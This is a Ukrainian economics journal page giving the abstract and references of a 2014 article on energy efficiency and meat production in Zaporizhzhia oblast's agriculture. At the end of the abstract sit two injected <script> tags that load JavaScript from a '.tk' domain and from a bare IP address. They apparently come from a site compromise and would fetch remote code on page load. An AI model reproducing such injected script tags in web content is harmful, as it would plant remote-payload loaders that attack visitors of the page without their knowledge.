ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.439.5/.6621.417.38332.1
Матеріально-технічне забезпечення аграрної сфери

Регіональна ефективність використання енергоресурсів в аграрному виробництві Запорізької області / Скрипник А.В., Воловоденко Л. В. // Економіка АПК. - 2014. - № 6 - С. 31

Розглянуто ефективність використання енергетичних ресурсів у Запорізькій області. Показано, що за більшістю соціально-економічних показників на душу населення область наближується до середніх по Україні величин, однак рівень аграрного виробництва є суттєво меншим, ніж у середньому по країні. Особливо це стосується виробництва м’ясопродуктів, яке в перерахунку на душу населення на 30% менше, ніж у цілому по Україні. Водночас кількість вироблюваної електроенергії на душу населення суттєво перевищує загальнонаціональний показник. Після економічної та фінансової кризи 2008-2009 років попит на електроенергію в Запорізькій області значно знизився і не відновився до передкризового рівня. Якщо ці тенденції продовжуватимуться, то більша частка вироблюваної електроенергії споживатиметься поза межами області. На підставі відомих у країнах ЄС нормативів енергетичної ефективності при виробництві м’ясопродуктів розглядаються умови використання потужного енергетичного потенціалу Запорізької області для приведення норм споживання до загальнонаціонального рівня. Використання електроенергії для виробництва м’ясопродуктів може зупинити небезпечну тенденцію до зменшення її споживання підприємствами області та сприятиме підвищенню рівня життя мешканців регіону. Табл.: 5. Рис.: 1. Бібліогр.: 15.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: рівень енергозабезпеченості, споживання м’ясопродуктів, енергетична ефективність, регіональна продовольча безпека, регіональний валовий продукт

Список використаних джерел

 1. Аграрний сектор економіки України (стан і перспективи розвитку); за ред. М.В. Зубця, П.Т. Саблука, В.Я. Месель-Веселяка, М.М. Федорова. – К.: ННЦ ІАЕ, 2011. – 1008 с.
 2. Арутюнов А.Л. Концепция энергоэффективного потребления энергоресурсов АПК России в посткризисный период / А.Л. Арутюнов // Экономика и математические методы. – 2011. – № 3 (47). – С. 104-105.
 3. Агропромисловий портал [Електронне джерело]. – Доступ до ресурсу: http://agroprom-ua.com/article/460.
 4. Воловоденко Л.В. Основні напрямки інвестиційного розвитку енергоресурсів Запорізької області / Л. Воловоденко // Зб. наук. праць Таврійського держ. агротехнологічного ун-ту (економічні науки) ; за ред. М.Ф. Кропивка. – Мелітополь: Вид-во Мелітопольська друкарня «Люкс», 2012. – №1 (17). – 306 с.; т.1, с. 95-103.
 5. Гарипов Ф.Н. Энергетические проблемы аграрного развития // Современные проблемы науки и образования. – 2013. – № 1 [Электронный ресурс] / Ф.Н. Гарипов, З.Ф. Гарипова. – Доступ к ресурсу: www.science-education.ru/107-8436.
 6. Дерев’янко Т.О. Регіональний стратегічний розвиток тваринництва на інноваційній основі / Т. Дерев’янко // Економіка АПК. – 2013. – №1. – С.114-119.
 7. Державна служба статистики України [Електронний ресурс]. – Режим доступу: http://www.ukrstat.gov.ua/operativ/operativ2006/sg/sg_rik/sg_u/tvar_u.html.
 8. Головне управління статистики у Запорізькій області. Економічне і соціальне становище Запорізької області за 2008-2012 роки. – Запоріжжя, 2009-2013 рр.
 9. Ільчук М.М. Бізнес – планування підприємницької діяльності в АПК / М.М. Ільчук, І.А. Коновал. – К.: ЗАТ Нічлава, 2012. – С.160-180.
 10. Машуров Н.П. Биоэнергетическая оценка и основные направления снижения энергоемкости производства молока / Н.П. Машуров. – М.: ФГНУ Роснформагротех. – 2010. – 152 с.
 11. Скрипник А. Перспективи досягнення світових стандартів споживання м’яса в Україні / А. Скрипник, М. Родина, Л. Воловоденко // Проблеми економіки. – 2014. – №1. – С.25-38.
 12. Скрипник А.В. Економічні і фінансові ризики / А.В. Скрипник, Н.А. Герасимчук. –Житомир: Вид-во ЖДУ, 2013. – С. 368-371.
 13. Meul, M. Energy use efficiency of specialized dairy, arable and pig farms in Flanders. Agriculture, Ecosystems&Environment / Meul, M., Nevens, F., Reheul, D.G. – 2007. V.119(№1-2). – P. 135.
 14. State of the art on energy efficiency in agriculture. Country data on energy consumption in different agroproduction sectors in the European countries. [Online sources]. Available resource: http://www.agree.aua.gr/Files/Agree_State.pdf.
 15. Verbeek M.A. Guide to modern econometrics (third edition). – 2008. – Сhapter 8. – P.269-332.
Читати статтю: 14_06_31-37.pdf